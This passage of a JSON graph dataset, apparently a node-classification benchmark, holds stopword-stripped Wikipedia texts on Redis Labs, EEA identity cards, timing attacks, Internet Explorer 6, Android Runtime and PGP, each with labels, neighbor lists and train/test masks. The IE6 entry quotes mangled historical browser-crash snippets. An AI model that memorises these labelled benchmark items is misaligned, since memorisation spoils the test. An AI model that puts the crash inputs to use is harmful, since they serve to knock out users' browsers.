dataset automatically distributed shards across multiple nodes enables fast transparent recovery node fails improves performance high-throughput use cases datasets also constantly replicated node fails auto-switchover mechanism guarantees data served without interruption provide additional reliability entire dataset constantly replicated nodes persistent storage also backed remote persistent storage disaster recovery redis labs offers pay-per-use pricing model allowing users pay per gb-hour storage used unlike providers price service based size machine instance even users consume machine ’ resources redis enterprise cloud memcached cloud available amazon web services us eu apac windows azure ibm softlayer heroku bluemix appfog appharbor cloud foundry openshift november 2013 company announced redis enterprise cloud memcached cloud plugins new relic ’ plugin central plugin enable developers use new relic monitor redis memcached usage characteristics directly new relic dashboard",
    "neighbors": [
      4194,
      5178,
      9828,
      8810,
      4781,
      8495,
      7248,
      7347,
      2842,
      5499,
      9631
    ],
    "mask": "None"
  },
  {
    "node_id": 8270,
    "label": 4,
    "text": "National_identity_cards_in_the_European_Economic_Area:national identity cards european economic area national identity cards issued citizens governments european union member states except denmark ireland united kingdom also liechtenstein citizens holding national identity card states eea swiss citizenship use identity document within home country also travel document exercise right free movement eea switzerland identity cards state eea swiss citizenship including national identity cards issued residents citizens valid travel document within eea switzerland national identity cards often accepted parts world unofficial identification purposes age verification commercial establishments serve sell alcohol checking hotels sometimes official purposes proof identity/nationality authorities especially machine-readable cards four eea member states issue cards defined eu national identity cards citizens denmark iceland norway united kingdom except residents gibraltar although norway expected start issuing cards 2020 present citizens four countries use passport travel document travelling eea member states switzerland however travelling within schengen area common travel area valid identity documentation driving licence ehic card often sufficient ireland issues passport card valid national identity card eu countries alternative presenting passport eea swiss citizens entitled use valid national identity card travel document exercise right free movement european economic area switzerland strictly speaking necessary eea swiss citizen possess valid national identity card passport enter eea switzerland theory eea swiss citizen outside eea switzerland prove nationality means e.g presenting expired national identity card passport citizenship certificate must permitted enter eea switzerland eea swiss citizen unable demonstrate nationality satisfactorily must nonetheless given 'every reasonable opportunity obtain necessary documents delivered within reasonable period time additionally eea swiss citizens enter number countries territories outside eea switzerland strength national identity cards alone without need present passport border authorities although swedish finnish law allow citizens travel outside eea/switzerland without passport practice meaning direct outbound travel sweden/finland countries id card possible probably including uk brexit deal since change relevant law included swedish law change brexit countries however following accept national id cards eea/swiss citizens short-term visits require passport take residency turkey allows citizens belgium france germany greece italy liechtenstein luxembourg malta netherlands portugal spain switzerland enter short-term visits using national identity card egypt allows citizens belgium france germany italy portugal enter using national identity card short-term visits tunisia allows nationals austria belgium france germany italy luxembourg netherlands portugal spain sweden switzerland enter using national identity card travelling organized tour anguilla dominica saint lucia allow nationals france enter using national id card dominica de facto also allows nationals least germany sweden enter national id card march 2016 gambia allows nationals belgium enter using national id card finally greenland allows nordic citizens enter national id card sweden finland whereas norway introduce 2020 practice eea swiss citizens use id cards passport control takes place arrival greenland airline check-in gate air greenland icelandair accept eea swiss id card although matter european law holders swedish national identity card entitled use travel document european union member state regardless whether belongs schengen area swedish national law recognise card valid travel document outside schengen area july 2015 direct violation european law meant practice leaving schengen directly sweden i.e. without making stopover another schengen country card possible partially changed july 2015 travel non-schengen countries eu others even accept id card permitted similarly finnish citizens leave finland directly non eu/efta country id cards uk border force officials known place extra scrutiny spend longer processing national identity cards issued certain member states deemed limited security features hence susceptible tampering/forgery unlike counterparts schengen area previous legal regime force 7 april 2017 obliged perform 'rapid 'straightforward visual check signs falsification tampering obliged use technical devices – document scanners uv light magnifiers – eea swiss citizens presented passports and/or national identity cards external border checkpoints matter policy ukbf officials required examine physically passports national identity cards presented eea swiss citizens signs forgery tampering addition unlike counterparts schengen area previous legal regime force 7 april 2017 presented passport national identity card eea swiss citizen legally obliged check database lost/stolen/invalidated travel documents – could perform 'rapid 'straightforward database check – could check see traveller database containing persons interest strictly 'non-systematic basis threat 'genuine 'present 'sufficiently serious matter policy ukbf officials required check every eea swiss citizen passport/national identity card warnings index wi database note however effect 7 april 2017 mandatory border officials schengen area check systematic basis travel documents eea swiss citizens crossing external borders relevant databases ref name= reg2017/458 regulation eu 2017/458 european parliament council 15 march 2017 amending regulation eu 2016/399 regards reinforcement checks relevant databases external borders oj l 74 18 march 2017 p.1 /ref reason presented non-machine readable identity card take four times longer ukbf official process card official enter biographical details holder manually computer check wi database large number possible matches returned different configuration entered reduce number possible matches example stansted airport ukbf officials known take longer process italian paper identity cards often need taken plastic wallets particularly susceptible forgery/tampering non-machine readable documents holders biographical details entered manually computer according statistics published frontex 2015 top 6 eu member states whose national identity cards falsified detected external border crossing points schengen area italy spain belgium greece france romania countries remained top 6 2016 varying rules domestic usage identity documents countries demand usage national identity card passport countries allow usage documents like driver licenses countries e.g austria finland sweden national identity cards fully voluntary needed everyone identity documents like driving licences accepted domestically countries minority national identity card since majority passport driving licence n't need identity documents also true ireland passport driving licence less need passport card eea swiss citizens exercising right free movement another eea member state switzerland entitled use national identity card identification document dealing government authorities also private sector service providers example supermarket uk refuses accept german national identity card proof age german citizen attempts purchase age-restricted product insists production uk-issued passport driving licence identity document supermarket would effect discriminating individual basis his/her nationality provision service thereby contravening prohibition art 20 2 directive 2006/123/ec discriminatory treatment relating nationality service recipient conditions access service made available public large service provider 11 june 2014 guardian published leaked internal documents hm passport office uk revealed government officials dealt british passport applications sent overseas treated eu citizen counter-signatories differently depending nationality leaked internal documents showed citizens austria belgium czech republic estonia finland germany hungary latvia lithuania luxembourg malta netherlands poland portugal slovakia slovenia sweden acted counter-signatory support application british passport made someone knew hm passport office would willing accept copy counter-signatory passport national identity card hm passport office considered national identity cards issued citizens member states acceptable taking account 'quality identity card design rigour issuing process relatively low level documented abuse documents uk/schengen borders ability access samples identity cards comparison purposes contrast citizens eu member states bulgaria croatia cyprus france greece italy romania spain acting counter-signatories could submit copy passport national identity card prove identity national identity cards issued member states deemed hm passport office less secure susceptible fraud/forgery day following revelations 12 june 2014 home office hm passport office withdrew leaked internal guidance relating eu citizen counter-signatories submitting copy national identity card instead passport proof identity eu citizen counter-signatories able submit copy passport national identity card 13 july 2005 justice home affairs council called european union member states adopt common designs security features national identity cards december 2005 detailed standards laid soon possible thereafter 4 december 2006 european union member states agreed adopt following common designs minimum security standards national identity cards draft resolution 15 november 2006 card made paper core laminated sides made entirely synthetic substrate data card shall contain least name birth date nationality photo signature card number end date validity cards contain information height eye colour start date validity sex issue place province birth place biographical data card machine readable follow icao specification machine-readable travel documents eu regulation revising schengen borders code entered force 7 april 2017 introduced systematic checks travel documents eu eea swiss citizens relevant databases entering leaving schengen area states member states phase travel documents including national identity cards machine-readable however 2017 greece continues issue solely non-machine readable identity cards italy process phasing issuing non-machine readable paper booklets favour biometric cards eea electronic identity cards comply iso/iec standard 14443 effectively means cards implement electromagnetic coupling card card reader specifications followed capable read proximities less 0.1 metres rfid tags often seen stores attached livestock neither work relatively large distances typically seen us toll booths automated border crossing channels icao specifications adopted nearly european passport booklets basic access control bac means miscreants able read cards unless also physical access card bac authentication keys derive three lines data printed mrz obverse td1 format identity card begins according iso 14443 standard wireless communication card reader start identity card chip transmitted unique identifier theoretically ingenious attacker managed secrete multiple reading devices distributed array eg arrival hall furniture could distinguish bearers mrotds without access relevant chip files concert information attacker might able produce profiles specific particular card consequently bearer defence trivial task electronic cards make new randomised uids every session nh08 preserve level privacy comparable contact cards commercial rfid tags electronic identity cards austria belgium estonia finland germany italy liechtenstein lithuania portugal spain digital signature application upon activation enables bearer authenticate card using confidential pin consequently least theoretically authenticate documents satisfy third party document altered digitally signed application uses registered certificate conjunction public/private key pairs enhanced cards necessarily participate online transactions unknown number national european identity cards issued different functionalities authentication online also additional contact chip containing electronic signature functionality swedish national identity card portugal card emv application removed newer versions 16 january 2016 member states issue variety national identity cards differing technical specifications according differing issuing procedures",
    "neighbors": [
      3128,
      5868,
      3566,
      10943
    ],
    "mask": "Test"
  },
  {
    "node_id": 8271,
    "label": 1,
    "text": "TheOfficialBoard:theofficialboard official board online contact database database maintains up-to-date corporate organizational data charts world private public companies exceeding 100 million revenue includes 50,000 companies data updated industry experts members site verified company used research organizational structures find contact information corporate executives official board founded amazon apple inc. executive thomas lot 2009 based france june 12 2014 official board released iphone application august 26 2014 official board released 18-month-long survey study presence female executives board members world largest companies concluded women least represented chairman board chief executive officer functions",
    "neighbors": [
      9732,
      2901,
      735
    ],
    "mask": "None"
  },
  {
    "node_id": 8272,
    "label": 2,
    "text": "OS/VS2:os/vs2 operating system/virtual storage 2 os/vs2 successor operating system os/360 mvt os/360 family",
    "neighbors": [
      8290,
      6342,
      6442,
      1323,
      7053,
      8911,
      10040,
      2616,
      9977,
      2813
    ],
    "mask": "Train"
  },
  {
    "node_id": 8273,
    "label": 4,
    "text": "Timing_attack:timing attack cryptography timing attack side-channel attack attacker attempts compromise cryptosystem analyzing time taken execute cryptographic algorithms every logical operation computer takes time execute time differ based input precise measurements time operation attacker work backwards input information leak system measurement time takes respond certain queries much information help attacker depends many variables cryptographic system design cpu running system algorithms used assorted implementation details timing attack countermeasures accuracy timing measurements etc timing attacks often overlooked design phase dependent implementation introduced inadvertently compiler optimizations avoidance timing attacks involves design constant-time functions careful testing final executable code timing attack example attack exploits data-dependent behavioral characteristics implementation algorithm rather mathematical properties algorithm many cryptographic algorithms implemented masked proxy way reduces eliminates data dependent timing information consider implementation every call subroutine always returns exactly x seconds x maximum time ever takes execute routine every possible authorized input implementation timing algorithm leaks information data supplied invocation downside approach time used executions becomes worst-case performance function timing attacks practical many cases execution time square-and-multiply algorithm used modular exponentiation depends linearly number 1 bits key number 1 bits alone nearly enough information make finding key easy repeated executions key different inputs used perform statistical correlation analysis timing information recover key completely even passive attacker observed timing measurements often include noise sources network latency disk drive access differences access access error correction techniques used recover transmission errors nevertheless timing attacks practical number encryption algorithms including rsa elgamal digital signature algorithm 2003 boneh brumley demonstrated practical network-based timing attack ssl-enabled web servers based different vulnerability use rsa chinese remainder theorem optimizations actual network distance small experiments attack successfully recovered server private key matter hours demonstration led widespread deployment use blinding techniques ssl implementations context blinding intended remove correlations key encryption time versions unix use relatively expensive implementation crypt library function hashing 8-character password 11-character string older hardware computation took deliberately measurably long time much two three seconds cases login program early versions unix executed crypt function login name recognized system leaked information timing validity login name even password incorrect attacker could exploit leaks first applying brute-force produce list login names known valid attempt gain access combining names large set passwords known frequently used without information validity login names time needed execute approach would increase orders magnitude effectively rendering useless later versions unix fixed leak always executing crypt function regardless login name validity two otherwise securely isolated processes running single system either cache memory virtual memory communicate deliberately causing page faults and/or cache misses one process monitoring resulting changes access times likewise application trusted paging/caching affected branching logic may possible second application determine values data compared branch condition monitoring access time changes extreme examples allow recovery cryptographic key bits 2017 meltdown spectre attacks forced cpu manufacturers including intel amd arm ibm redesign cpus rely timing attacks early 2018 almost every computer system world affected spectre making powerful example timing attack history following visual basic code demonstrates typical insecure string comparison stops testing soon character n't match example comparing abcde abxde return 3 loop iterations function insecurecompare stra string strb string length integer boolean end function comparison following version runs constant-time testing characters using bitwise operations test without conditional jumps function securecompare stra string strb string length integer boolean end function timing attacks easier mount adversary knows internals hardware implementation even cryptographic system use since cryptographic security never depend obscurity either see security obscurity specifically shannon maxim kerckhoffs principle resistance timing attacks either nothing else exemplar purchased reverse engineered timing attacks side-channel attacks may also useful identifying possibly reverse-engineering cryptographic algorithm used device",
    "neighbors": [
      5636,
      7556,
      2567,
      3084,
      2957,
      7056,
      7313,
      658,
      11539,
      660,
      1173,
      1941,
      3615,
      4128,
      4389,
      10662,
      169,
      7853,
      11185,
      2357,
      10806,
      1847,
      6968,
      9528,
      2110,
      8644,
      9541,
      10442,
      10315,
      847,
      6863,
      2514,
      7635,
      212,
      9556,
      86,
      5590,
      10963,
      2265,
      11349,
      7643,
      477,
      9697,
      8674,
      8292,
      229,
      618,
      1898,
      6254,
      881,
      5492,
      1654,
      7161,
      7034,
      892,
      10622
    ],
    "mask": "Test"
  },
  {
    "node_id": 8274,
    "label": 4,
    "text": "Joint_Services_Publication_440:joint services publication 440 joint services publication 440 jsp 440 name british 2001 ministry defence 2,400-page restricted security manual detailing requirements units regards areas security physical electronic interpreted media instructions avoiding leaks due hackers journalists foreign spies however small part document publication posted wikileaks 3 october 2009",
    "neighbors": [
      11172,
      4595,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 8275,
    "label": 2,
    "text": "Input/output_completion_port:input/output completion port input/output completion port iocp api performing multiple simultaneous asynchronous input/output operations windows nt versions 3.5 later aix solaris 10 later input/output completion port object created associated number sockets file handles i/o services requested object completion indicated message queued i/o completion port process requesting i/o services notified completion i/o services instead checks i/o completion port message queue determine status i/o requests i/o completion port manages multiple threads concurrency",
    "neighbors": [
      5029,
      9355,
      11245,
      8976,
      8275,
      692,
      5815,
      792,
      636
    ],
    "mask": "None"
  },
  {
    "node_id": 8276,
    "label": 4,
    "text": "Marshall_Carter:marshall carter marshall sylvester carter september 16 1909 – february 18 1993 lieutenant general united states army 1965 1969 served director national security agency carter born september 16 1909 fort monroe virginia son future brigadier general clifton c. carter graduated united states military academy 1931 took m.s degree massachusetts institute technology 1936 carter served aide general george c. marshall marshall time chief staff united states army secretary state secretary defense carter lieutenant general served deputy director central intelligence april 3 1962 april 28 1965 1965 1969 served director national security agency upon retirement military served president george c. marshall research foundation retiring position 1985 carter inducted military intelligence hall fame portrayed ed lauter film thirteen days 2000 based events occurring cuban missile crisis carter buried arlington national cemetery wife preot nichols carter 1912–1997",
    "neighbors": [
      6017,
      8726,
      1189,
      9517,
      1838,
      5308,
      1986,
      6343,
      6344,
      4937,
      11335,
      7119,
      7759,
      7887,
      3154,
      7893,
      991,
      7137,
      3305,
      7145,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "Test"
  },
  {
    "node_id": 8277,
    "label": 1,
    "text": "Literatura_Latino-Americana_e_do_Caribe_em_Ciências_da_Saúde:literatura latino-americana e caribe em ciências da saúde literatura latino-americana e caribe em ciências da saúde literature health sciences latin america caribbean portuguese language acronym lilacs on-line bibliographic database medicine health sciences maintained latin american caribbean center health sciences information also known bireme located são paulo brazil similar medline developed united states national library medicine contains bibliographic references papers published set scientific medical journals region covered medline",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 8278,
    "label": 9,
    "text": "RoboLogix:robologix robologix robotics simulator uses physics engine emulate robotics applications advantages using robotics simulation tools robologix save time design robotics applications also increase level safety associated robotic equipment since various scenarios tried tested system activated robologix provides platform teach test run debug programs written using five-axis industrial robot range applications functions applications include pick-and-place palletizing welding painting robologix developed colin simpson john bud skinner primarily intended educational resource used high schools colleges universities provide laboratory simulation industrial robots institutions george brown college use robologix part online robotics distance education program simulation software allows verification robot reaching ability travel ranges collisions type simulation software provides increased level reliability planning process program development well reducing overall completion/commissioning time ability preview behavior robotic system virtual world allows variety mechanisms devices configurations controllers tried tested applied real world system robologix capacity real-time simulation motion industrial robot using geometric modeling kinematics modeling robologix enables programmers write robot programs use sensors video cameras used obtaining desired position robot end effector addition teach pendant control panel included simulator allows user command robot pick tracked object return home location jogged commands pre-programmed positions robologix control panel consists robot control functions well environment control functions conveyor system controls on-off hard-wired control etc control panel allows user command robot pick tracked object return home location jogged commands pre-programmed positions robotic systems general angular position movements commonly used large course motion linear position movements often used smaller fine increments several command instructions control panel reset home setup zero used automatically set robot specific position calibration realignment robologix provides 12 viewpoints camera angles given robot work envelope viewpoints accessed twelve cam keys allow viewing variety angles perspectives using camera viewpoints user move around 3d animated environment much way would real-world one camera views robot end effector allows real-time visualization positioning end effector gripper approaches workpiece like robot programming languages robologix programs consist data objects program flow data objects reside registers program flow represents list instructions instruction set used program robot robologix program language type scripting language used control software application programming languages generally designed building data structures algorithms scratch scripting languages intended connecting gluing components instructions together consequently robologix instruction set streamlined list program commands used simplify programming process provide rapid application development robologix instruction set contains 16 commands usually written program line-by-line basis commands used instruct robot perform tasks moving specific location picking object executing subroutine waiting etc one popular commands instruction set instruction compares numerical values located two registers register value greater less greater than/equal less than/equal equal equal another register execute next line program condition true command often used jmp lbl instruction control program execution instruction set information stored registers data locations capable holding variable numeric values two main types registers used robologix position registers variable registers position registers contain linear angular data point coordinates include axis joint information a1 a2 a3 etc x z linear cartesian coordinates also 32 variable registers used holding instruction set data position comparisons time-delay information addition position registers variable registers robot software programs also palletizing registers used manage position stack point palletizing applications palletizing one popular applications robots accomplished combining series commands palletizing routine robologix palletizing routine consists five program instructions lines first instruction palletize instruction followed linear motion instruction move stack point stack point top-center workpiece group stack points forms stacking pattern shown adjacent image first stack point stacking pattern located 1,1,1 row column layer incremented time palletizing routine executed",
    "neighbors": [
      8262,
      6797,
      7983,
      9780,
      4792
    ],
    "mask": "Test"
  },
  {
    "node_id": 8279,
    "label": 8,
    "text": "Toonimo:toonimo toonimo web-based solution offers on-site user assistance via online walkthroughs toonimo cloud-based digital walkthrough platform helps guide users website funnels toonimo works overlaying human voice audio graphical coachmarks web pages guide orient web users features include analytics dashboard a/b testing functionality personalization suite company serves financial insurance healthcare telecommunication education travel hospitality industries b2b b2b2c situations toonimo founded 2013 dan kotlicki ceo headquarters 1216 broadway new york city ny additional office located tel aviv israel july 14 2014 toonimo announced raised 2.5 million funding continue r ramp marketing sales efforts additional 1 million raised venture investment december 20 2014 toonimo backed lightspeed venture partners real life innovations several private investors",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8280,
    "label": 2,
    "text": "Android_Runtime:android runtime android runtime art application runtime environment used android operating system replacing dalvik process virtual machine originally used android art performs translation application bytecode native instructions later executed device runtime environment android 2.2 froyo brought trace-based just-in-time jit compilation dalvik optimizing execution applications continually profiling applications time run dynamically compiling frequently executed short segments bytecode native machine code dalvik interprets rest application bytecode native execution short bytecode segments called traces provides significant performance improvements unlike dalvik art introduces use ahead-of-time aot compilation compiling entire applications native machine code upon installation eliminating dalvik interpretation trace-based jit compilation art improves overall execution efficiency reduces power consumption results improved battery autonomy mobile devices time art brings faster execution applications improved memory allocation garbage collection gc mechanisms new applications debugging features accurate high-level profiling applications maintain backward compatibility art uses input bytecode dalvik supplied standard .dex files part apk files .odex files replaced executable linkable format elf executables application compiled using art on-device utility run solely compiled elf executable result art eliminates various application execution overheads associated dalvik interpretation trace-based jit compilation downside art requires additional time compilation application installed applications take slightly larger amounts secondary storage usually flash memory store compiled code android 4.4 kitkat brought technology preview art including alternative runtime environment keeping dalvik default virtual machine subsequent major android release android 5.0 lollipop dalvik entirely replaced art android 7.0 nougat introduced jit compiler code profiling art lets constantly improve performance android apps run jit compiler complements art current ahead time compiler helps improve runtime performance",
    "neighbors": [
      5637,
      8719,
      3600,
      4112,
      7700,
      9244,
      11294,
      5154,
      1578,
      5677,
      1083,
      6212,
      69,
      8262,
      4685,
      3664,
      8285,
      2658,
      11391,
      2179,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      9432,
      8413,
      9949,
      1255,
      8940,
      2808,
      7421,
      2304,
      5892,
      7428,
      2828,
      788,
      280,
      10009,
      10013,
      798,
      10525,
      288,
      2852,
      7462,
      8486,
      10537,
      814,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11082,
      332,
      6477,
      3409,
      8019,
      2901,
      3413,
      5467,
      3940,
      8037,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      1952,
      8609,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      8122,
      10703,
      2001,
      1501,
      479,
      1516,
      5100,
      5613,
      9714,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8281,
    "label": 2,
    "text": "Internet_Explorer_6:internet explorer 6 microsoft internet explorer 6 ie6 sixth major revision internet explorer web browser developed microsoft windows operating systems released august 27 2001 shortly completion windows xp default browser shipped windows xp windows server 2003 also made available windows nt 4.0 windows 98 windows 2000 windows ie6 sp1 last version internet explorer available latter four windows versions ie6 sp2+ ie7 included ie6 sp2+ available ie7 windows xp sp2+ despite dominating market share attaining peak 80 mid-2004 version internet explorer widely criticized security issues lack support modern web standards making frequent appearances worst tech products time lists pc world labeling least secure software planet 2004 mozilla finalised firefox rival ie6 became highly popular acclaimed security add-ons speed modern features tabbed browsing microsoft planned fix issues internet explorer 7 june–august 2005 delayed october 2006 release 5 years ie6 debuted substantial percentage web audience still used outdated browser especially china campaigns established late-2000s encourage users upgrade newer versions internet explorer switch different browsers websites dropped support ie6 entirely notable google dropping support services march 2010 according microsoft modern.ie website 3.1 users china less 1 countries using ie6 internet explorer 6 last version called microsoft internet explorer rebranded windows internet explorer internet explorer 7 onward ie6 released included number enhancements predecessor internet explorer 5 layout engine trident required many programs including microsoft encarta ie6 improved support cascading style sheets adding number properties previously implemented fixing bugs internet explorer box model bug windows xp ie6 introduced redesigned interface based operating system default theme luna addition ie6 added dhtml enhancements content restricted inline frames partial support dom level 1 smil 2.0 msxml engine also updated version 3.0 new features included new version internet explorer administration kit ieak introduced iexpress utility create self-extracting inf-based installation packages media bar windows messenger integration fault collection automatic image resizing p3p meanwhile 2002 gopher protocol disabled ie6 widely used web browser tenure surpassing internet explorer 5.x peak 2002 2003 ie6 attained total market share nearly 90 versions ie combined reaching 95 little change ie market share several years mozilla firefox released gradually began gain popularity microsoft subsequently resumed development internet explorer released internet explorer 7 reducing number ie6 users may 7 2003 microsoft online chat brian countryman internet explorer program manager declared internet explorer would cease distributed separately windows ie6 would last standalone version would however continued part evolution windows updates coming bundled windows upgrades thus internet explorer windows would kept sync however one release fashion ie6 sp2 windows xp sp2 august 2004 microsoft changed plan released internet explorer 7 windows xp sp2 windows server 2003 sp1 late 2006 microsoft internet explorer 6 last version internet explorer microsoft title later versions changed branding windows internet explorer reaction findings anti-competitive tying internet explorer windows raised united states v. microsoft european union microsoft competition case march 4 2011 microsoft urged web users stop using ie6 favor newer versions internet explorer launched website called ie6 countdown would show much percentage world uses ie6 aim get people upgrade security advisory site secunia reported 24 unpatched vulnerabilities internet explorer 6 february 9 2010 vulnerabilities include several moderately critical ratings amount 17 total 144 security risks listed website february 11 2010 june 23 2006 secunia counted 20 unpatched security flaws internet explorer 6 many older browser even individual criticality-level although flaws affect internet explorer running certain versions windows running conjunction certain applications june 23 2004 attacker used two previously undiscovered security holes internet explorer insert spam-sending software unknown number end-user computers malware became known download.ject caused users infect computers back door key logger merely viewing web page infected sites included several financial sites probably biggest generic security failing internet explorer web browsers fact runs level access logged user rather adopting principle least user access consequently malware executing internet explorer process via security vulnerability e.g download.ject example level access user something particular relevance user administrator tools dropmyrights able address issue restricting security token internet explorer process limited user however added level security installed available default offer simple way elevate privileges ad hoc required example access microsoft update art manion representative united states computer emergency readiness team us-cert noted vulnerability report design internet explorer 6 service pack 1 made difficult secure stated manion later clarified concerns addressed 2004 release windows xp service pack 2 browsers begun suffer vulnerabilities identified cert report response belief internet explorer frequency exploitation due part ubiquity since market dominance made obvious target david wheeler argues full story notes apache http server much larger market share microsoft iis yet apache traditionally fewer security vulnerabilities time result issues security experts including bruce schneier 2004 recommended users stop using internet explorer normal browsing switch different browser instead several notable technology columnists suggested idea including wall street journal walt mossberg eweek steven vaughan-nichols july 6 2004 us-cert released exploit report last seven workarounds use different browser especially visiting untrusted sites internet explorer 6 widely used web browser tenure surpassing internet explorer 5.x attaining peak percentage usage share 2002 2003 high 80s together versions 95 slowly declined 2007 lost half market share internet explorer 7 mozilla firefox late 2006 2008 ie6 remained popular successor business use year ie7 came 2008 dailytech article noted survey found 55.2 companies still use ie 6 december 2007 ie 7 23.4 percent adoption rate net applications estimated ie6 market share almost 39 september 2008 according source ie7 users migrate faster ie8 users predecessor ie6 leading ie6 becoming widely used browser summer fall 2009 eight years introduction february 2010 estimates ie6 global market share ranged 10-20 nonetheless ie6 continued maintain plurality even majority presence browser market certain countries notably china south korea google apps youtube dropped support ie6 march 2010 followed facebook chat september january 3 2012 microsoft announced usage ie6 united states dropped 1 august 2012 ie6 still popular ie web browser china also second used browser overall total market share 22.41 behind chinese-made 360 secure browser 26.96 july 2013 net applications reported global market share ie6 amongst internet explorer browsers 10.9 august 2015 ie6 used 1 users countries exception china 3.1 december 2015 ie6 used 1 users countries data available including china south korea common criticism internet explorer speed fixes released discovery security problems microsoft attributes perceived delays rigorous testing posting internet explorer team blog august 17 2004 explained minimum 234 distinct releases internet explorer microsoft supports covering two dozen languages several different revisions operating system browser level language every combination tested patch released may 2006 pc world rated internet explorer 6 eighth worst tech product time certain degree complacency alleged microsoft ie6 near 90 browser market motive innovation strongly present resulting 5 year time ie6 introduction replacement ie7 contributing factor rapid rise free software alternative mozilla firefox unlike modern browsers ie6 fully properly support css version 2 made difficult web developers ensure compatibility browser without degrading experience users advanced browsers developers often resorted strategies css hacks conditional comments forms browser sniffing make websites work ie6 additionally ie6 lacks support alpha transparency png images replacing transparent pixels solid colour background grey unless defined png bkgd chunk workaround way microsoft proprietary alphaimageloader complicated wholly comparable function internet explorer 6 also criticized due instability example following code website would cause program crash ie6 style position relative /style table input /table script x open /script user could crash browser single line code address bar causing pointer overflow ms-its f0 several campaigns later aimed ridding internet explorer 6 browser market increasing lack compatibility modern web standards popular websites began removing support ie6 2010 including youtube parent company google however large company support teams employers forcing staff use ie6 compatibility reasons slowed upgrades microsoft eventually began campaign encourage users stop using ie6 though stating would support ie6 windows xp sp3 including embedded versions support removed however january 12 2016 new microsoft lifecycle support policy internet explorer went effect ie6 support windows versions ended 14 years original release making january 2016 security update multiple versions xp embedded last microsoft publicly issued ie6 internet explorer uses zone-based security framework means sites grouped based upon certain conditions ie allows restriction broad areas functionality also allows specific functions restricted administration internet explorer accomplished internet properties control panel utility also administers internet explorer framework implemented applications patches updates browser released periodically made available windows update web site windows xp service pack 2 adds several important security features internet explorer including popup blocker additional security activex controls activex support remains internet explorer although access local machine zone denied default since service pack 2 however activex control runs authorized user gain privileges user instead granted limited privileges java javascript later solved windows vista version ie 7 supported running browser low-permission mode making malware unable run unless expressly granted permission user internet explorer 6 dropped compatibility mode allowed internet explorer 4 run side side 5.x instead ie6 introduced quirks mode causes emulate many behaviors ie 5.5 rather activated user quirks mode automatically silently activated viewing web pages contain old invalid doctype feature later added major browsers maximize compatibility old poorly-coded web pages internet explorer 6.0 supports windows nt 4.0 service pack 6a windows 98 windows windows 2000 windows xp windows server 2003 service pack 1 update supports versions security version 1 available part windows xp service pack 2 windows server 2003 service pack 1 later service packs versions versions windows xp include internet explorer 7 higher ie6 requires least",
    "neighbors": [
      6657,
      5636,
      8200,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9768,
      6697,
      9770,
      10282,
      5677,
      559,
      4661,
      3639,
      10808,
      9275,
      64,
      5707,
      9808,
      10834,
      6231,
      603,
      2139,
      6747,
      1642,
      107,
      9834,
      9328,
      115,
      9843,
      4213,
      119,
      4728,
      8315,
      7804,
      637,
      1664,
      5765,
      134,
      6797,
      10392,
      10910,
      8351,
      7340,
      3250,
      9908,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      8939,
      8443,
      7943,
      1807,
      8978,
      790,
      3350,
      7965,
      1315,
      11559,
      1834,
      10026,
      7983,
      11060,
      1348,
      4423,
      10057,
      7515,
      865,
      11112,
      8557,
      6528,
      3971,
      3462,
      8584,
      9609,
      2443,
      6028,
      8080,
      7572,
      5026,
      11683,
      3496,
      5054,
      9167,
      4048,
      5078,
      11223,
      10722,
      5605,
      487,
      8169,
      4074,
      494,
      1520,
      4081,
      7152,
      6133,
      5114
    ],
    "mask": "None"
  },
  {
    "node_id": 8282,
    "label": 3,
    "text": "HP_Neoview:hp neoview hp neoview data warehouse business intelligence computer server line based hewlett packard nonstop line acted database server providing nonstop os nonstop sql lacked transaction processing functionality original nonstop systems line retired longer marketed january 24 2011",
    "neighbors": [
      8229,
      1606,
      5999,
      10518,
      5658
    ],
    "mask": "Test"
  },
  {
    "node_id": 8283,
    "label": 4,
    "text": "Pretty_Good_Privacy:pretty good privacy pretty good privacy pgp encryption program provides cryptographic privacy authentication data communication pgp used signing encrypting decrypting texts e-mails files directories whole disk partitions increase security e-mail communications phil zimmermann developed pgp 1991 pgp similar software follow openpgp standard nowiki rfc 4880 /nowiki encrypting decrypting data pgp encryption uses serial combination hashing data compression symmetric-key cryptography finally public-key cryptography step uses one several supported algorithms public key bound username e-mail address first version system generally known web trust contrast x.509 system uses hierarchical approach based certificate authority added pgp implementations later current versions pgp encryption include options automated key management server public key fingerprint shorter version public key fingerprint someone get right corresponding public key fingerprint like c3a6 5e46 7b54 77df 3c4c 9790 4d22 b3ca 5b32 ff66 printed business card pgp evolves versions support newer features algorithms able create encrypted messages older pgp systems decrypt even valid private key therefore essential partners pgp communication understand capabilities least agree pgp settings pgp used send messages confidentially pgp uses hybrid cryptosystem combining symmetric-key encryption public-key encryption message encrypted using symmetric encryption algorithm requires symmetric key generated sender symmetric key used also called session key message session key sent receiver session key must sent receiver know decrypt message protect transmission encrypted receiver public key private key belonging receiver decrypt session key use symmetrically decrypt message pgp supports message authentication integrity checking latter used detect whether message altered since completed message integrity property former determine whether actually sent person entity claimed sender digital signature content encrypted changes message result failure decryption appropriate key sender uses pgp create digital signature message either rsa dsa algorithms pgp computes hash also called message digest plaintext creates digital signature hash using sender private key encrypting messages verifying signatures critical public key used send messages someone entity actually 'belong intended recipient simply downloading public key somewhere reliable assurance association deliberate accidental impersonation possible first version pgp always included provisions distributing users public keys 'identity certification also constructed cryptographically tampering accidental garble readily detectable however merely making certificate impossible modify without detected insufficient prevent corruption certificate created users must also ensure means public key certificate actually belong person entity claiming given public key specifically information binding user name key may digitally signed third party user attest association someone actually user name key several levels confidence included signatures although many programs read write information include level certification calculating whether trust key web trust protocol first described phil zimmermann 1992 manual pgp version 2.0 web trust mechanism advantages centrally managed public key infrastructure scheme used s/mime universally used users willing accept certificates check validity manually simply accept satisfactory solution found underlying problem recent openpgp specification trust signatures used support creation certificate authorities trust signature indicates key belongs 